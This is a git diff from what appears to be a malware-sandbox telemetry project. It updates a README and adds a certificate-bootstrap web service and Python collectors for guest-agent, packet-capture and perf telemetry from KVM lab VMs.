|
||||
```
|
||||
|
||||
The idle-VM envelope shape is distinct from the synthetic load: periodic
|
||||
~10% CPU spikes from KVM/timer interrupts, flat ~230 MiB RSS, a single
|
||||
late-boot disk write. That's a real KVM guest you're seeing.
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary><b>Multi-host fleet — how cross-host diversity works</b></summary>
|
||||
|
||||
Each lab host's `host_id` (set in `/etc/cis490/lab-host.toml`) seeds a
|
||||
deterministic walk through the sample catalog:
|
||||
|
||||
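```python
# samples/manifest.py (simplified)
import hashlib

def select(self, *, host_id, slot, episode_index):
    # Hash the (host, slot, episode) triple into a stable catalog index.
    seed = f"{host_id}|{slot}|{episode_index}".encode()
    # First 8 digest bytes as an integer; the byte order here is illustrative.
    idx = int.from_bytes(hashlib.sha256(seed).digest()[:8], "big") % len(self.samples)
    return self.samples[idx]
```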
|
||||
|
||||
So:
- `host=alice slot=0 ep=0` and `host=bob slot=0 ep=0` almost certainly
  pick *different* samples (test asserts < 25% collision over 20 trials).
- A single host walks the entire catalog within ~`len(manifest)` waves
  (test confirms full coverage in 200 episodes).
- No coordinator needed — every host independently produces non-overlapping
  data, and `meta.fleet.host_id` + `meta.sample.name` make the join trivial
  at training time.
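
The properties in the list above can be checked with a standalone version of the selection rule. This sketch re-implements the hashing idea outside the manifest class. The big-endian byte order, the catalog size passed as `n_samples`, and both function names are assumptions made for illustration.

```python
import hashlib


def select_index(host_id: str, slot: int, episode_index: int, n_samples: int) -> int:
    """Map a (host, slot, episode) triple to a stable index in [0, n_samples)."""
    seed = f"{host_id}|{slot}|{episode_index}".encode("utf-8")
    digest = hashlib.sha256(seed).digest()
    return int.from_bytes(digest[:8], "big") % n_samples


def collision_rate(host_a: str, host_b: str, n_samples: int, episodes: int = 200) -> float:
    """Fraction of episodes on slot 0 where two hosts pick the same index."""
    same = sum(
        select_index(host_a, 0, ep, n_samples) == select_index(host_b, 0, ep, n_samples)
        for ep in range(episodes)
    )
    return same / episodes
```

Because the only input is the seed string, any host can recompute which sample another host ran for a given slot and episode, which is what makes a coordinator unnecessary.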
|
||||
|
||||
The fleet runner shells out to the same `tools/run_real_vm_demo.py` per
|
||||
slot, with `SLOT` / `RUN_DIR` / `SAMPLE_NAME` env passed through to the
|
||||
launcher. Each VM gets its own QMP socket, agent socket, hostfwd port
|
||||
range, and episode dir, so concurrency is collision-free up to the
|
||||
capacity ceiling.
|
||||
|
||||
</details>
|
||||
|
||||
|
|
@ -177,15 +318,18 @@ late-boot disk write. That's a real KVM guest you're seeing.
|
|||
| [`docs/deploy.md`](docs/deploy.md) | One-command install for the lab-host and receiver roles |
|
||||
| [`docs/lab-setup.md`](docs/lab-setup.md) | KVM prereqs, VM build, snapshot, virtio-serial wiring |
|
||||
| [`docs/sources.md`](docs/sources.md) | Works cited — every tool, dep, sample source, paper, and standard |
|
||||
| `orchestrator/` | State machine that drives the boot → arm → detonate → observe → revert loop |
|
||||
| `collectors/` | One module per telemetry source (host /proc, QMP, perf, pcap, guest agent) |
|
||||
| `receiver/` | Starlette app: PUT /v1/episodes ingest, sha256-verified, idempotent |
|
||||
| `vm/` | qcow2 images, launch scripts, snapshot recipes (binaries gitignored) |
|
||||
| `tools/` | Demo runners, load mimic, plot scripts |
|
||||
| `exploits/` | Metasploit resource scripts for repeatable exploitation (TODO) |
|
||||
| `samples/` | Sample manifest (sha256-pinned). **Binaries never committed.** |
|
||||
| `orchestrator/` | Episode runner + `fleet.py` (capacity detection, concurrent slot driver) |
|
||||
| `collectors/` | One module per telemetry source: `proc_qemu`, `qmp`, `pcap`, `guest_agent` |
|
||||
| `receiver/` | Starlette app: PUT `/v1/episodes` + POST `/v1/ping`, sha256-verified, idempotent |
|
||||
| `shipper/` | Lab-host-side: scan `data/episodes/`, tar+zstd, PUT over mTLS, retry/backoff |
|
||||
| `vm/` | Launch scripts (`launch_demo.sh`, `launch_target.sh`), `setup_bridge.sh`, in-guest agent at `vm/guest-agent/cis490_agent.py`. qcow2 images and pcap captures gitignored. |
|
||||
| `tools/` | `run_fleet.py`, `run_real_vm_demo.py`, `run_tier3_demo.py`, `build_cidata.py`, `plot_envelope.py`, `show_envelope.sh` |
|
||||
| [`exploits/`](exploits/README.md) | MSF RPC client (`msfrpc.py`), `driver.py` (v2 with sample dispatch), `workloads.py` (six profile-matched in-session loops), per-module TOML configs |
|
||||
| [`samples/`](samples/manifest.toml) | Sample manifest + loader. Binaries land at `samples/store/<sha256>` (gitignored). |
|
||||
| `scripts/` | `install-{lab-host,receiver,msfrpcd}.sh`, `fetch-metasploitable2.sh` |
|
||||
| `training/` | Model training code (deferred — schema first) |
|
||||
| `etc/` | systemd units and config templates installed by the deploy scripts |
|
||||
| `etc/` | systemd units and config templates (`cis490-{receiver,shipper,orchestrator}.service`, `lab-host.toml.example`, `receiver.toml.example`) |
|
||||
| [`AGENTS.md`](AGENTS.md) | Conventions for AI agents working on this and sibling spectral repos |
|
||||
|
||||
</details>
|
||||
|
||||
|
|
@@ -226,17 +370,26 @@ Two roles, one bootstrap command each. Detailed in
`index.jsonl`. Runs on the Pi5 in our setup.

```sh
# On a lab host:
./scripts/install-lab-host.sh # (TODO — currently bring up by hand per docs/deploy.md)

# On the Pi5 (or any always-on WG node):
./scripts/install-receiver.sh # (TODO — same)
sudo ./scripts/install-receiver.sh
# Add the collector.wg block to spectral/caddy (already merged), then:
sudo systemctl enable --now cis490-receiver

# One-time, on the Pi: bootstrap the CIS490 client CA.
sudo /home/max/.env/wg-pki/scripts/init-cis490-client-ca.sh

# On each lab host: enroll via wg-enroll first, then:
sudo ./scripts/install-lab-host.sh
# Drop a TLS leaf from wg-pki at /etc/cis490/certs/, edit /etc/cis490/lab-host.toml.
sudo systemctl enable --now cis490-shipper cis490-orchestrator
```

For now both bootstrap scripts are scaffolds; the units and configs they
install live in `etc/`. The receiver itself works today
(`uv run python -m receiver --config etc/receiver.toml.example` — modify
paths).
The orchestrator service runs `tools/run_fleet.py --waves 1` per
invocation with `Restart=always`, giving a continuous stream of
fresh-sample episodes per host. The shipper picks them up as
`done.marker` files appear and PUTs them to `https://collector.wg`.

For mTLS leaf-cert minting: `spectral/wg-pki/scripts/issue-cis490-client-cert.sh <host_id>`.

</details>

|||
0
bootstrap/__init__.py
Normal file
65
bootstrap/__main__.py
Normal file
@@ -0,0 +1,65 @@
"""``cis490-bootstrap`` launcher.

Runs as root (needs CA private key access). Listens on 127.0.0.1:8446
behind Caddy's ``bootstrap.wg`` site — Caddy terminates TLS, this
service speaks plain HTTP on loopback only.
"""

from __future__ import annotations

import argparse
import logging
import sys
from pathlib import Path

import uvicorn

from bootstrap.app import make_app


def main(argv: list[str] | None = None) -> int:
    p = argparse.ArgumentParser(prog="cis490-bootstrap")
    p.add_argument("--listen-host", default="127.0.0.1")
    p.add_argument("--listen-port", type=int, default=8446)
    p.add_argument(
        "--issuer-script",
        type=Path,
        default=Path("/home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh"),
        help="Path to the wg-pki leaf-cert mint script.",
    )
    p.add_argument(
        "--issued-root",
        type=Path,
        default=Path("/home/max/.env/wg-pki/issued"),
        help="Where minted tarballs are cached.",
    )
    p.add_argument("--log-level", default="info")
    args = p.parse_args(argv)

    logging.basicConfig(
        level=getattr(logging, args.log_level.upper(), logging.INFO),
        format="%(asctime)s %(levelname)s %(name)s %(message)s",
    )
    log = logging.getLogger("cis490.bootstrap.main")

    if not args.issuer_script.exists():
        log.error("issuer script missing: %s", args.issuer_script)
        return 2

    app = make_app(
        issuer_script=args.issuer_script,
        issued_root=args.issued_root,
    )
    log.info("listening on %s:%d", args.listen_host, args.listen_port)
    uvicorn.run(
        app,
        host=args.listen_host,
        port=args.listen_port,
        log_level=args.log_level,
        access_log=True,
    )
    return 0


if __name__ == "__main__":
    sys.exit(main())
146
bootstrap/app.py
Normal file
@@ -0,0 +1,146 @@
"""``cis490-bootstrap`` — auto-issue mTLS leaf certs to enrolled lab hosts.

This is the chicken-and-egg fix for first-time lab-host setup. A
freshly wg-enrolled device has WG access (and trusts the wg-pki CA)
but has no client cert yet, so it can't authenticate to the
mTLS-protected ``collector.wg``. This service exposes a *plain-TLS*
(no client-auth) endpoint that the lab host can call once during
``install-lab-host.sh`` to retrieve its leaf cert tarball.

Trust boundary: anything that reaches ``bootstrap.wg`` has already
passed iptmonads' WG-membership check at L4. No further
authentication is required for the bootstrap pull — by the time a
caller can connect at all they're a peer the operator authorized.

The privilege boundary, on the other hand, is real: minting certs
requires the wg-pki CA private key (root-only at
``/var/lib/wg-pki/cis490-client-ca/ca.key``). This service therefore
runs as root in a tight sandbox (see ``etc/cis490-bootstrap.service``)
and shells out to ``issue-cis490-client-cert.sh`` for each mint.

Endpoints:

    GET /v1/cert/{host_id} — return tarball of {ca.crt, leaf.pem, leaf.key}
                             for ``host_id``. Cached — successive calls
                             return the same bytes.
    GET /v1/health         — liveness probe (no auth needed).

Each mint is logged with the source IP (after Caddy's X-Real-IP
forward) so the operator has an audit trail of which devices have
fetched which certs.
"""

from __future__ import annotations

import logging
import re
import subprocess
import time
from pathlib import Path
from typing import Awaitable, Callable

from starlette.applications import Starlette
from starlette.requests import Request
from starlette.responses import FileResponse, JSONResponse, Response
from starlette.routing import Route


log = logging.getLogger("cis490.bootstrap")


# Sane host_id charset — same rules the receiver enforces, mirrored
# here so mint requests can't smuggle path traversal in.
_HOST_ID_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def _is_valid_host_id(s: str) -> bool:
    return bool(_HOST_ID_RE.match(s))


def make_app(
    *,
    issuer_script: Path,
    issued_root: Path,
    rate_limit_window_s: float = 5.0,
) -> Starlette:
    """Build the Starlette app. Wired by the production launcher in
    ``bootstrap/__main__.py``; tests can pass synthetic paths."""
    issued_root.mkdir(parents=True, exist_ok=True)

    # Coarse per-IP rate limiter to make a casual scan annoying. Not
    # a real defense — the WG mesh is the actual perimeter.
    last_request: dict[str, float] = {}

    async def health(request: Request) -> Response:
        return JSONResponse({"status": "ok"})

    async def get_cert(request: Request) -> Response:
        host_id: str = request.path_params["host_id"]
        if not _is_valid_host_id(host_id):
            return JSONResponse({"error": "bad host_id"}, status_code=400)

        # Caddy forwards the original WG-side IP via X-Real-IP /
        # X-Forwarded-For; fall back to the direct peer if running
        # without Caddy in front (tests).
        src = (
            request.headers.get("x-real-ip")
            or (request.headers.get("x-forwarded-for") or "").split(",")[0].strip()
            or (request.client.host if request.client else "?")
        )

        now = time.monotonic()
        prev = last_request.get(src, 0.0)
        if (now - prev) < rate_limit_window_s:
            return JSONResponse(
                {"error": "rate limited; back off"},
                status_code=429,
            )
        last_request[src] = now

        tar_path = issued_root / host_id / f"{host_id}.tar"
        if not tar_path.exists():
            log.info("minting cert for host_id=%s src=%s", host_id, src)
            try:
                subprocess.run(
                    [
                        str(issuer_script), host_id,
                        "--out-dir", str(issued_root / host_id),
                    ],
                    check=True,
                    capture_output=True,
                    text=True,
                    timeout=30,
                )
            except subprocess.CalledProcessError as e:
                log.error("issue script failed for %s: rc=%d stderr=%s",
                          host_id, e.returncode, e.stderr[:500])
                return JSONResponse(
                    {"error": "mint failed", "detail": e.stderr[:500]},
                    status_code=500,
                )
            except (OSError, subprocess.TimeoutExpired) as e:
                log.exception("issue script transport error for %s", host_id)
                return JSONResponse(
                    {"error": f"transport: {e}"},
                    status_code=500,
                )
        else:
            log.info("cache hit for host_id=%s src=%s", host_id, src)

        if not tar_path.exists():
            return JSONResponse({"error": "tarball not produced"}, status_code=500)
        return FileResponse(
            tar_path,
            media_type="application/x-tar",
            filename=f"{host_id}.tar",
            headers={
                "X-Cis490-Host-Id": host_id,
                "X-Cis490-Cert-Source-IP": src,
            },
        )

    routes = [
        Route("/v1/health", health, methods=["GET"]),
        Route("/v1/cert/{host_id}", get_cert, methods=["GET"]),
    ]
    return Starlette(routes=routes)
||||
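The `host_id` charset check in `bootstrap/app.py` is what keeps a mint request from steering `issued_root / host_id` somewhere unexpected, so its edge cases are worth exercising. The sketch below copies the pattern from the file and compares the `re.match` check with a stricter variant. `is_valid_host_id_strict` is a hypothetical helper and not part of this commit. Two details of Python semantics matter here: `$` also matches just before a trailing newline, and the strings `.` and `..` consist only of allowed characters. Whether such inputs can actually reach the handler depends on how Caddy and the router normalize paths, which this diff does not establish.

```python
import re

# Pattern copied verbatim from bootstrap/app.py.
HOST_ID_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def is_valid_host_id(s: str) -> bool:
    """Same check as the commit: re.match against the anchored pattern."""
    return bool(HOST_ID_RE.match(s))


def is_valid_host_id_strict(s: str) -> bool:
    """Hypothetical stricter variant: fullmatch plus a ban on dot segments."""
    return s not in (".", "..") and HOST_ID_RE.fullmatch(s) is not None


if __name__ == "__main__":
    for candidate in ("lab-host_01.wg", "../etc", "..", "lab-01\n"):
        print(repr(candidate),
              is_valid_host_id(candidate),
              is_valid_host_id_strict(candidate))
```

Both checks reject anything containing `/`, so a multi-segment traversal such as `../etc` never passes. The variants differ only on `.`, `..`, and a trailing newline.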
119
collectors/guest_agent.py
Normal file
@@ -0,0 +1,119 @@
"""Source 5 (feature, deployable): in-guest agent reader.

QEMU exposes a virtio-serial channel two ways:
  - inside the guest: ``/dev/virtio-ports/cis490.guest.agent``
  - on the host: a unix socket at ``$RUN_DIR/agent.sock``

The in-guest agent (`vm/guest-agent/cis490_agent.py`) writes one
JSON-lines row per tick into the guest-side device. Bytes traverse the
virtio bus and surface on the host socket. This collector reads them,
re-stamps with the host's monotonic clock (so rows align with all
other telemetry on a single timeline), and persists to
``telemetry-guest.jsonl``.

Why re-stamp? The agent's clock is the *guest* clock, which can drift
from the host (rare in KVM, but happens during live-migration tests
and on heavy host load). The original guest timestamps stay in the row
under ``t_guest_*`` so analysts can quantify drift if they care.

This source is the **deployable** side: every row is tagged
``available_in_deployment: true``. See docs/threat-model.md.
"""

from __future__ import annotations

import json
import logging
import socket
import threading
import time
from pathlib import Path


log = logging.getLogger("cis490.collectors.guest_agent")

SOURCE = "guest_agent"
AVAILABLE_IN_DEPLOYMENT = True


def _connect(socket_path: Path, timeout_s: float) -> socket.socket | None:
    deadline = time.monotonic() + timeout_s
    last_err: OSError | None = None
    while time.monotonic() < deadline:
        try:
            s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            s.settimeout(2.0)
            s.connect(str(socket_path))
            return s
        except OSError as e:
            last_err = e
            time.sleep(0.5)
    if last_err is not None:
        log.warning("guest-agent socket %s never came up: %s", socket_path, last_err)
    return None


def _stamp(row: dict, t_mono_origin_ns: int) -> dict:
    """Replace the agent's wall-only timestamps with host-clock ones,
    keeping the originals under ``t_guest_*`` for drift analysis."""
    out = dict(row)
    out.setdefault("t_guest_mono_ns", row.get("t_guest_mono_ns"))
    out.setdefault("t_guest_wall_ns", row.get("t_guest_wall_ns"))
    out["t_mono_ns"] = time.monotonic_ns() - t_mono_origin_ns
    out["t_wall_ns"] = time.time_ns()
    out.setdefault("source", SOURCE)
    out.setdefault("available_in_deployment", AVAILABLE_IN_DEPLOYMENT)
    return out


def run_loop(
    socket_path: str | Path,
    output_path: Path,
    t_mono_origin_ns: int,
    stop_event: threading.Event,
    *,
    connect_timeout_s: float = 30.0,
) -> int:
    """Read agent JSON-lines from the host-side virtio-serial unix
    socket. Re-stamp each row with the host clock and persist."""
    sock_path = Path(socket_path)
    sock = _connect(sock_path, connect_timeout_s)
    if sock is None:
        return 0

    rows = 0
    output_path.parent.mkdir(parents=True, exist_ok=True)
    buf = b""
    try:
        with output_path.open("a", buffering=1) as f:
            while not stop_event.is_set():
                try:
                    sock.settimeout(0.5)
                    chunk = sock.recv(8192)
                except socket.timeout:
                    continue
                except OSError as e:
                    log.warning("guest-agent recv failed: %s", e)
                    break
                if not chunk:
                    log.info("guest-agent socket closed")
                    break
                buf += chunk
                while b"\n" in buf:
                    line, _, buf = buf.partition(b"\n")
                    line = line.strip()
                    if not line:
                        continue
                    try:
                        row = json.loads(line)
                    except json.JSONDecodeError as e:
                        log.warning("dropping malformed guest-agent line: %s", e)
                        continue
                    f.write(json.dumps(_stamp(row, t_mono_origin_ns)) + "\n")
                    rows += 1
    finally:
        try:
            sock.close()
        except OSError:
            pass
    return rows
||||
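The read loop in `collectors/guest_agent.py` has to cope with JSON lines that arrive split across `recv()` chunks, and then stamp each decoded row with the host clock. The sketch below isolates those two steps so they can be exercised without a socket. The `feed` and `stamp` names are hypothetical, and the sample rows are synthetic. It illustrates the framing technique and is not a drop-in replacement for `run_loop`.

```python
import json
import time


def feed(buf: bytes, chunk: bytes) -> tuple[list[dict], bytes]:
    """Append one received chunk; return (decoded rows, unfinished tail)."""
    buf += chunk
    rows = []
    while b"\n" in buf:
        line, _, buf = buf.partition(b"\n")
        line = line.strip()
        if not line:
            continue
        try:
            rows.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # drop the malformed line, keep the stream alive
    return rows, buf


def stamp(row: dict, t_mono_origin_ns: int) -> dict:
    """Add host-clock timestamps; fields the guest sent are left in place."""
    out = dict(row)
    out["t_mono_ns"] = time.monotonic_ns() - t_mono_origin_ns
    out["t_wall_ns"] = time.time_ns()
    return out


if __name__ == "__main__":
    origin = time.monotonic_ns()
    rows, tail = feed(b"", b'{"t_guest_mono_ns": 5, "cpu": 1}\n{"cpu"')
    rows2, tail = feed(tail, b": 2}\n")
    for r in rows + rows2:
        print(stamp(r, origin))
```

Carrying the unfinished tail between calls is what makes the parser independent of where the virtio transport happens to cut the byte stream.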
288
collectors/pcap.py
Normal file
@@ -0,0 +1,288 @@
"""Source 4 (feature, deployable): bridge-side pcap + bucketed netflow.

Captures packets on the host-only ``br-malware`` bridge during an
episode, writes the raw pcap, and produces a bucketed JSONL file the
trainer can consume directly.

The capture is **gateway-side** — the orchestrator sees the same
packets a real upstream router/gateway would see in deployment, so
features derived here transfer 1:1 to the deployment-time gateway
observer.

Implementation:

  - ``run_capture()`` spawns ``tcpdump -i <bridge> -U -w <out.pcap>``
    as a subprocess for the episode duration. ``-U`` flushes per
    packet so the file is consumable mid-flight.

  - ``bucketize()`` reads a finished pcap and emits 100 ms-bucketed
    rows into ``netflow.jsonl``. Pure-Python pcap parser (no scapy /
    dpkt dependency); decodes Ethernet + IPv4 + TCP/UDP enough to fill
    the schema in docs/data-model.md.

The pure-Python parser is intentionally minimal — it does NOT do
fragment reassembly, IPv6, VLAN tags, or anything fancy. It handles
the cases that occur on a host-only bridge for malware behaviour:
plain Ethernet II, IPv4, TCP/UDP. Other frames are still counted at
the byte/packet level but skipped for protocol-specific stats.
"""

from __future__ import annotations

import json
import logging
import os
import struct
import subprocess
import threading
import time
from collections import defaultdict
from dataclasses import dataclass
from pathlib import Path


log = logging.getLogger("cis490.collectors.pcap")

SOURCE = "bridge_pcap"
AVAILABLE_IN_DEPLOYMENT = True

# Pcap file-level header
_PCAP_GLOBAL_HDR = "<IHHiIII"
_PCAP_GLOBAL_HDR_SIZE = 24
_PCAP_REC_HDR = "<IIII"
_PCAP_REC_HDR_SIZE = 16
_PCAP_MAGIC_USEC = 0xa1b2c3d4
_PCAP_MAGIC_NSEC = 0xa1b23c4d  # nanosecond resolution variant


# ---------------------------------------------------------------------------
# Capture
# ---------------------------------------------------------------------------


@dataclass
class CaptureHandle:
    proc: subprocess.Popen
    pcap_path: Path
    bridge: str
    started_mono_ns: int


def run_capture(
    *,
    bridge: str,
    pcap_path: Path,
    snaplen: int = 256,
    bpf: str | None = None,
) -> CaptureHandle:
    """Start a tcpdump capture on ``bridge``. Returns a handle the
    caller stops via ``stop_capture()``."""
    pcap_path.parent.mkdir(parents=True, exist_ok=True)
    args = ["tcpdump", "-i", bridge, "-U", "-s", str(snaplen), "-w", str(pcap_path)]
    if bpf:
        args.append(bpf)
    log.info("starting pcap: %s", " ".join(args))
    proc = subprocess.Popen(
        args,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.PIPE,
        # tcpdump may need root or CAP_NET_RAW. We don't elevate here.
    )
    return CaptureHandle(
        proc=proc, pcap_path=pcap_path, bridge=bridge,
        started_mono_ns=time.monotonic_ns(),
    )


def stop_capture(handle: CaptureHandle, *, timeout_s: float = 5.0) -> int:
    """SIGINT tcpdump (the Right Signal — flushes buffers + exits 0).
    Returns the process exit code."""
    proc = handle.proc
    if proc.poll() is None:
        proc.send_signal(2)  # SIGINT
        try:
            proc.wait(timeout=timeout_s)
        except subprocess.TimeoutExpired:
            proc.kill()
            proc.wait(timeout=timeout_s)
    return proc.returncode


# ---------------------------------------------------------------------------
# Pure-Python pcap parser
# ---------------------------------------------------------------------------


def _iter_pcap(path: Path):
    """Yield ``(t_pkt_ns, frame_bytes)`` for every record in a pcap
    file. Tolerates either microsecond or nanosecond magics."""
    with path.open("rb") as f:
        hdr = f.read(_PCAP_GLOBAL_HDR_SIZE)
        if len(hdr) < _PCAP_GLOBAL_HDR_SIZE:
            return
        magic = struct.unpack("<I", hdr[:4])[0]
        if magic == _PCAP_MAGIC_USEC:
            sub_mult = 1000  # us → ns
        elif magic == _PCAP_MAGIC_NSEC:
            sub_mult = 1
        else:
            log.warning("unknown pcap magic %#x in %s", magic, path)
            return
        while True:
            rec = f.read(_PCAP_REC_HDR_SIZE)
            if len(rec) < _PCAP_REC_HDR_SIZE:
                return
            ts_sec, ts_sub, caplen, _ = struct.unpack(_PCAP_REC_HDR, rec)
            data = f.read(caplen)
            if len(data) < caplen:
                return
            t_ns = ts_sec * 1_000_000_000 + ts_sub * sub_mult
            yield t_ns, data


def _decode(frame: bytes) -> dict:
    """Decode an Ethernet/IPv4/{TCP,UDP} frame to a flat dict. Unknown
    protocols return only the ethertype + lengths."""
    out: dict = {"size": len(frame)}
    if len(frame) < 14:
        return out
    ethertype = struct.unpack(">H", frame[12:14])[0]
    out["ethertype"] = ethertype
    if ethertype != 0x0800:  # not IPv4 — count, don't decode further
        return out
    ip = frame[14:]
    if len(ip) < 20:
        return out
    ihl = (ip[0] & 0x0F) * 4
    if ihl < 20 or len(ip) < ihl:
        return out
    proto = ip[9]
    src = ip[12:16]
    dst = ip[16:20]
    out["ip_proto"] = proto
    out["src_ip"] = ".".join(str(b) for b in src)
    out["dst_ip"] = ".".join(str(b) for b in dst)
    payload = ip[ihl:]
    if proto == 6 and len(payload) >= 20:  # TCP
        sport, dport, _, _, off_flags = struct.unpack(">HHIIH", payload[:14])
        flags = off_flags & 0x003F
        out["src_port"] = sport
        out["dst_port"] = dport
        out["tcp_flags"] = flags  # FIN=1 SYN=2 RST=4 PSH=8 ACK=16 URG=32
    elif proto == 17 and len(payload) >= 8:  # UDP
        sport, dport, _, _ = struct.unpack(">HHHH", payload[:8])
        out["src_port"] = sport
        out["dst_port"] = dport
    return out


def bucketize(
    pcap_path: Path,
    netflow_path: Path,
    *,
    bucket_ms: int = 100,
    t_mono_origin_ns: int = 0,
    bridge_ip: str = "10.200.0.1",
) -> int:
    """Read a pcap and emit one row per ``bucket_ms`` window into
    ``netflow.jsonl``. The ``in/out`` direction is from the bridge
    perspective (host = ``bridge_ip``):

        out = packet whose src is the host-side address (host → guest)
        in  = anything else seen on the bridge (guest → host or
              guest-to-guest)

    Returns the number of rows written."""
    if not pcap_path.exists():
        return 0
    bucket_ns = bucket_ms * 1_000_000
    netflow_path.parent.mkdir(parents=True, exist_ok=True)

    rows = 0
    bucket_start: int | None = None
    agg: dict = _empty_bucket()
    with netflow_path.open("a", buffering=1) as out:
        for t_pkt_ns, frame in _iter_pcap(pcap_path):
            d = _decode(frame)
            # Establish first bucket origin on first packet.
            if bucket_start is None:
                bucket_start = t_pkt_ns - (t_pkt_ns % bucket_ns)
            while t_pkt_ns >= bucket_start + bucket_ns:
                _flush(out, agg, bucket_start, bucket_ns, t_mono_origin_ns)
                rows += 1
                agg = _empty_bucket()
                bucket_start += bucket_ns
            _accumulate(agg, d, bridge_ip)
        if bucket_start is not None and any(v for v in agg.values() if v):
            _flush(out, agg, bucket_start, bucket_ns, t_mono_origin_ns)
            rows += 1
    return rows


def _empty_bucket() -> dict:
    return {
        "pkts_in": 0, "pkts_out": 0,
        "bytes_in": 0, "bytes_out": 0,
        "syn_count": 0, "fin_count": 0, "rst_count": 0,
        "udp_count": 0, "tcp_count": 0,
        "dns_query_count": 0,
        "dst_ips": set(), "dst_ports": set(),
        "tcp_new_flows": 0,
    }


def _accumulate(agg: dict, d: dict, bridge_ip: str) -> None:
    sz = d.get("size", 0)
    is_out = d.get("src_ip") == bridge_ip
    if is_out:
        agg["pkts_out"] += 1
        agg["bytes_out"] += sz
    else:
        agg["pkts_in"] += 1
        agg["bytes_in"] += sz

    proto = d.get("ip_proto")
    if proto == 6:
        agg["tcp_count"] += 1
        flags = d.get("tcp_flags", 0)
        if flags & 0x02:  # SYN
            agg["syn_count"] += 1
            if not (flags & 0x10):  # SYN without ACK = new flow
                agg["tcp_new_flows"] += 1
        if flags & 0x01:
            agg["fin_count"] += 1
        if flags & 0x04:
            agg["rst_count"] += 1
    elif proto == 17:
        agg["udp_count"] += 1
        if d.get("dst_port") == 53:
            agg["dns_query_count"] += 1

    dst = d.get("dst_ip")
    if dst:
        agg["dst_ips"].add(dst)
    dport = d.get("dst_port")
    if dport is not None:
        agg["dst_ports"].add(dport)


def _flush(out, agg: dict, bucket_start_ns: int, bucket_ns: int, t_mono_origin_ns: int) -> None:
    row = {
        "t_mono_ns": bucket_start_ns - t_mono_origin_ns,
        "t_wall_ns": bucket_start_ns,
        "source": SOURCE,
        "available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
        "bucket_ms": bucket_ns // 1_000_000,
        "pkts_in": agg["pkts_in"], "pkts_out": agg["pkts_out"],
        "bytes_in": agg["bytes_in"], "bytes_out": agg["bytes_out"],
        "syn_count": agg["syn_count"],
        "fin_count": agg["fin_count"],
        "rst_count": agg["rst_count"],
        "udp_count": agg["udp_count"],
        "tcp_count": agg["tcp_count"],
        "dns_query_count": agg["dns_query_count"],
        "unique_dst_ips": len(agg["dst_ips"]),
        "unique_dst_ports": len(agg["dst_ports"]),
        "tcp_new_flows": agg["tcp_new_flows"],
    }
    out.write(json.dumps(row) + "\n")
||||
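The byte offsets used by the minimal decoder in `collectors/pcap.py`, and the way a packet timestamp is snapped to its bucket, are easiest to check against a synthetic frame. The sketch below hand-builds an Ethernet II + IPv4 + TCP frame with `struct` and reads the flag bits back using the same offsets as `_decode`. The helper names (`build_tcp_frame`, `tcp_flags`, `bucket_start_ns`) are hypothetical, and the addresses and ports are made up for the example.

```python
import struct


def build_tcp_frame(src_ip, dst_ip, sport, dport, flags):
    """Assemble a minimal Ethernet II + IPv4 + TCP frame (checksums left at 0)."""
    eth = bytes(12) + struct.pack(">H", 0x0800)  # zeroed MACs + IPv4 ethertype
    ip = struct.pack(
        ">BBHHHBBH4s4s",
        0x45, 0, 40, 0, 0, 64, 6, 0,  # v4 with IHL=5, total length 40, TTL 64, proto TCP
        bytes(src_ip), bytes(dst_ip),
    )
    # Data offset 5 (20-byte header) in the top nibble, flags in the low bits.
    tcp = struct.pack(">HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags, 8192, 0, 0)
    return eth + ip + tcp


def tcp_flags(frame):
    """Return the low six TCP flag bits, or None if the frame is not IPv4/TCP."""
    if len(frame) < 34 or struct.unpack(">H", frame[12:14])[0] != 0x0800:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ihl < 20 or ip[9] != 6 or len(ip) < ihl + 14:
        return None
    off_flags = struct.unpack(">H", ip[ihl + 12:ihl + 14])[0]
    return off_flags & 0x003F


def bucket_start_ns(t_pkt_ns, bucket_ms=100):
    """Snap a packet timestamp down to the start of its bucket."""
    bucket_ns = bucket_ms * 1_000_000
    return t_pkt_ns - (t_pkt_ns % bucket_ns)


if __name__ == "__main__":
    syn = build_tcp_frame((10, 200, 0, 2), (10, 200, 0, 1), 40000, 80, 0x02)
    print(len(syn), tcp_flags(syn), bucket_start_ns(1_234_567_890))
```

Aligning buckets to multiples of the bucket width, rather than to the first packet, keeps bucket boundaries comparable across episodes that start at arbitrary times.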
201
collectors/perf_qemu.py
Normal file
@@ -0,0 +1,201 @@
"""Source 3 (oracle): ``perf stat -p <qemu_pid>`` sampler.

Spawns ``perf stat`` in interval-JSON mode against the qemu pid and
aggregates the per-event counter values into per-interval telemetry
rows. Unlike the /proc and QMP collectors, perf needs CAP_SYS_ADMIN
or ``kernel.perf_event_paranoid <= 1`` to read counters for a process
the collector doesn't own — typically true on a lab host running
QEMU under the cis490 service user.

Source 3 is **oracle-only** — perf counters are not available on a
deployed device. Every row carries ``available_in_deployment: false``.

The events we ask for are the small canonical set named in
docs/data-model.md:

    cycles, instructions, cache-references, cache-misses,
    branches, branch-misses, page-faults, context-switches

Anything perf can't enable on the host (e.g. cache-misses without
hardware support) is silently dropped from the row.
"""

from __future__ import annotations

import json
import logging
import shutil
import subprocess
import threading
import time
from pathlib import Path


log = logging.getLogger("cis490.collectors.perf_qemu")

SOURCE = "host_perf"
AVAILABLE_IN_DEPLOYMENT = False

DEFAULT_EVENTS = (
    "cycles",
    "instructions",
    "cache-references",
    "cache-misses",
    "branches",
    "branch-misses",
    "page-faults",
    "context-switches",
)


def perf_available() -> bool:
    return shutil.which("perf") is not None


def _coerce_int(s: str | int | None) -> int | None:
    if s is None:
        return None
    if isinstance(s, int):
        return s
    s = s.strip()
    if not s or s in ("<not counted>", "<not supported>"):
        return None
    # perf prints comma-separated thousands by default; we asked -j so
    # we usually get plain numbers, but guard for both shapes.
    s = s.replace(",", "")
    try:
        return int(s)
    except ValueError:
        try:
            return int(float(s))
        except ValueError:
            return None


def _build_row(t_mono_origin_ns: int, interval_s: float, agg: dict[str, int]) -> dict:
    cycles = agg.get("cycles")
